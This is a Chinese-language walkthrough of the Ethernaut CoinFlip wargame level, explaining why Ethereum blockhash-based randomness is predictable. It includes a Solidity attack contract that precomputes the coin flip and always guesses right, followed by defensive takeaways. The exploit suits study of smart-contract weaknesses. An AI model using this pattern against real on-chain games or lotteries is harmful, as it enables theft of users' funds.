以太坊區(qū)塊鏈是如何產生隨機性的

以太坊如何產生“隨機性”

以太坊區(qū)塊鏈上沒有真正的隨機性，只有被認為“足夠好”的隨機生成器。

開發(fā)人員目前通過在以太坊中的散列獨特性或難以篡改性的變量創(chuàng)建偽隨機性。此類變量的示例包括transaction TImestamp， sender address， block height 。

以太坊提供兩種主要的加密散列函數，即SHA-3和較新的KECCAK256，它們對這些輸入變量的串聯字符串進行散列。

最終生成的哈希被轉換為一個大整數，然后由n修改。 這是為了得到一組離散的概率整數，在0到n的期望范圍內。

請注意，在我們的Ethernaut練習中，n = 2代表硬幣翻轉的兩面。

這種在智能合約中導出偽隨機性的方法很容容易受到攻擊。如果知道輸入的黑客可以結此猜出“隨機”結果。

這就是解決CoinFlip級別的關鍵。 在這里，確定硬幣翻轉的輸入變量對于您來說是公開的。

詳情演練

我們來創(chuàng)建一個惡意智能合約，檢查硬幣翻轉的結果。

只有當你正確猜到了結果時，你才能調用真實合約的翻轉（bool _guess）函數。

1、在Remix IDE中，創(chuàng)建一個與CoinFlip.sol相關的惡意合同：

contract hackCoinFlip {

CoinFlip public originalContract = CoinFlip（

“your instance address”）;

uint256 FACTOR = 578960446186580977117854925043439539266349923

32820282019728792003956564819968;

funcTIon hackFlip（bool _guess） public {

//TODO

}

}

2、實現hackFlip（）函數，使用與原始智能合約相同的邏輯和輸入變量來預測翻轉結果。 既然你知道blockhash和block.number，那么你就能準確預測正確的_guess。

funcTIon hackFlip（bool _guess） public {

// pre-deteremine the flip outcome

uint256 blockValue = uint256（block.blockhash（block.number-1））;

uint256 coinFlip = blockValue / FACTOR;

bool side = coinFlip == 1 ？ true ： false;

// If I guessed correctly， submit my guess

if （side == _guess） {

originalContract.flip（_guess）;

} else {

// If I guess incorrectly， submit the opposite

originalContract.flip（！_guess）;

}

}

3、調用你的hackFlip（）函數10次。當您做出正確的猜測時，原始智能合約的consecuTIveWins計數器應該逐步增加。

關鍵安全要點

1. 沒有真的隨機性。

2. 在計算智能合約中的“隨機性”時（或者甚至從現有的隨機數庫繼承）時要格外注意。 如果您使用隨機性來確定比賽獲勝者，請記住，對手可以輕松猜出隨機結果并破解您的游戲！